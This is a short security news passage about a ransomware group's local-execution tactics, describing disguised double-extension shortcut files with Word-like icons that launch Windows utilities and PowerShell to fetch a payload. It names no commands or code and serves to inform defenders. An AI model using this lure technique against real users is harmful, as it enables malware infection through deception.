In a notable shift from conventional ransomware tactics, the Global Group has adopted a local execution strategy for its payloads, which presents significant challenges for traditional network-centric security measures. Researchers have observed that, unlike many modern ransomware operations that depend on external command-and-control (C2) infrastructure, the Global Group’s approach complicates detection and response efforts.
Weaponized LNK files
The infection process initiated by this group is particularly insidious. It begins when a user inadvertently opens a shortcut file that features a double extension, such as “Document.doc.lnk.” This clever manipulation takes advantage of Windows’ default setting to hide file extensions, causing the file to appear as a legitimate document to unsuspecting users. To further diminish suspicion, the shortcut icon is meticulously crafted to mimic that of a Microsoft Word file.
Upon execution, the .lnk file activates built-in Windows utilities, including cms.exe and PowerShell, which are then used to retrieve and execute the next-stage payload. This method is particularly effective as it circumvents security controls that typically focus on identifying malicious documents or executable attachments, allowing attackers to operate with a greater degree of stealth.
